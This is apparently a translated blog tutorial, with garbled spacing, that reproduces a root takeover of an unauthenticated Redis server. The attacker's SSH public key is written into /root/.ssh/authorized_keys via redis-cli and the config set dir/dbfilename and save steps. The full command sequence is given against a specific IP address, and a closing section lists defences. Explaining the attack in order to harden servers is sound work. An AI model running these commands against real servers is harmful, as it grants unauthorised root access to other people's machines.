foreword
I've installed on cloud services twice redis, and each time I was prompted to attack others. ( 我是好人怎么可能会干坏事呢) So my server must have been hacked, because it is a personal server, there is nothing important, the port is open all the year round, and the whitelist firewall is not enabled, and the most important thing is that no password is set. No wonder it was invaded every day, let’s reproduce it below.
principle
There are several ways to log in linux, the most commonly used is 密码登陆and RSA key 登陆, RSA keythe login is to generate a public-private corresponding secret key, and then put the public key into the linuxsystem /root/.ssh/authorized_keysfile, our local client can log in by importing the corresponding private key, this is RSA keythe login Way.
But why rediscan the server's rootauthority be obtained?
The above RSA keylogin method is to write the public key into the file on the server side authorized_keys, and redisthere is a persistent method to generate an RDB file, and write the public key into the file through persistence root, authored_keysso that the illegal public key is written In the verification file, we can log in with the corresponding private key later. ( 但是这种方式需要再redis是root启动的情况下使用,因为非root权限无法进入/root目录)
Generate RSA key
To generate a known public and private key RSA key, execute the following command on a server that can be logged in:
ssh-keygen -t rsa
After execution, the following two files will be generated
id_rsaIt is a private key, which is used to log in to the client;
id_rsa.pubit is a public key, which is placed on the server;
You can first verify whether you can log in to the server through these two keys, and move id_rsa.pubthe file to /root/.sshthe folder
cp id_rsa.pub /root/.ssh/
Then execute the following command, the public key is written to authorized_keysthe file
cat id_rsa.pub >>authorized_keys
Here, the public key method is used for login verification. After the verification is passed, save these two files, which will be used later.
install redis
rootUse the user to install redisand enable remote access on the simulated compromised server . If you need a tutorial on installing redis, you can read this article: Install redis online on Linux
redisGet Rootpermission by
We cannot log in without knowing linuxthe account password linux, but we can try to enter rootthe installation redis, first enter the command line
As mentioned in the above principle, redisthere is a way of persistence is to generate RDBa file, which will contain the original data. We put our public key in redisthe server, so that we can rootlog in to the account through the private key.
add newline
Add id_rsa.pubspaces before and after the file, otherwise redisthe persistence will contain some other content that does not differentiate the public key identification and will fail. Execute the following command
(echo -e '\n\n'; cat id_rsa.pub; echo -e '\n\n') > mykey.pub
The obtained mykey.pub file will be persisted in RDB
write to redis
mykey.pubWrite the file generated above to redis, and execute the following command:
cat mykey.pub | ./redis-cli -h 111.229.209.244 -p 6379 -x set crackit
Check redisif the value exists
Persistence
Here is the most important step, to persist the content we wrote into /root/.ssh/authorized_keysthe file, this step needs redisto be rootenabled to operate, otherwise the file cannot be operated.
Select a persistent address
// 选择持久化的地址
config set dir /root/.ssh
// 设置持久化文件的文件名称
config set dbfilename authorized_keys
// 保存操作
save
verify
Connect by public key and import our private key file
As shown below, the login is successful
look at authorized_keysthe file
The middle part is what we passed in 公钥. If you don’t add spaces and confuse it with other content, you may not be able to match it 秘钥. Now that we have obtained rootthe permission, you can do whatever you want. Let’s talk about how to protect against this problem.
protection
There are several necessary factors for this intrusion method
网络互通或公网访问默认端口没有防火墙或白名单没有密码或者密码简单使用root用户启动
The above problems are the most important problems that cause the root account to be obtained. As long as one or two of them do not meet the conditions, the possibility of being invaded will be greatly reduced. Therefore, according to the above factors, several protection solutions can be made:
- Close public network access
- set up firewall
- Modify the default port
- Set a complex password
root用start with non- userredis- use new version
redis
Non-public network access can prevent most malicious attacks. Setting up firewalls and whitelists can prevent 99%malicious attacks from external networks. Changing the default port to a custom port can make people unable to find the redis service. Setting a password is also essential.
If you use non- rootuser startup redisto 100%prevent this method of intrusion, because it needs to modify rootthe public key file in the directory
Using the new version redisdoes not allow operations without a password by default, so it can be avoided.